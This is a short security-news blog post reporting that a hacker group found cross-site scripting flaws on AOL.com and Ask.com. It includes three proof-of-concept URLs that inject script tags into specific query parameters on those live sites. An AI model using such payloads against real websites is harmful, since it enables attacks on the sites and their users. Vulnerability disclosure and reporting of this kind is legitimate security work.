AOL and ASK.com vulnerable to XSS attack , found by TeamHav0k

Hacker group "TeamHav0k" discovered Cross site scripting vulnerabilities in two High profile websites; Two XSS vulnerabilities found in AOL.COM and 1 vulnerability in Ask.com.

AOL is best known for its online software suite, also called AOL, that allowed customers to access the world's largest "walled garden" online community and eventually reach out to the Internet as a whole.

Ask.com is the #1 question answering service that delivers the best answers from the web and real people - all in one place. The map application of Ask.com is vulnerable to Xss attack.

"Well i just got bored and decided to find a few more XSS for ya guys :)"TeamHav0k Member said in the pastebin release.

Poc:

http://shopping.aol.com/articles/search/?q=XSSTest--></script><script>alert(1)</script>
http://www.aol.com/?icid=aolcomlogorefresh5&dlact=XSSTest</script><script>alert("1")</script>

http://www.ask.com/maps?qsrc=2930&sa="><script>alert(String.fromCharCode(34,69,114,114,111,114,34))</script>&fa="><script>alert(String.fromCharCode(34,69,114,114,111,114,34))</script>290+Atlanta,+GA

In the past, TeamHav0k joined with Zer0Lulz team and discovered xss vulnerabilities in lot of Educational institute websites.

Search This Blog

Sections

Popular Posts

Blog Archive

Labels

Report Abuse

About Me

Showing result(s) for

Popular Posts

Pages

AOL and ASK.com vulnerable to XSS attack , found by TeamHav0k

Footer About

Search This Blog

Sections

Popular Posts

Blog Archive

Labels

Report Abuse

About Me

Showing result(s) for

Popular Posts

Pages

Menu Item

Next

Newer Post

Previous

Older Post

TeamHav0k

Vulnerability

Web Application Vulnerability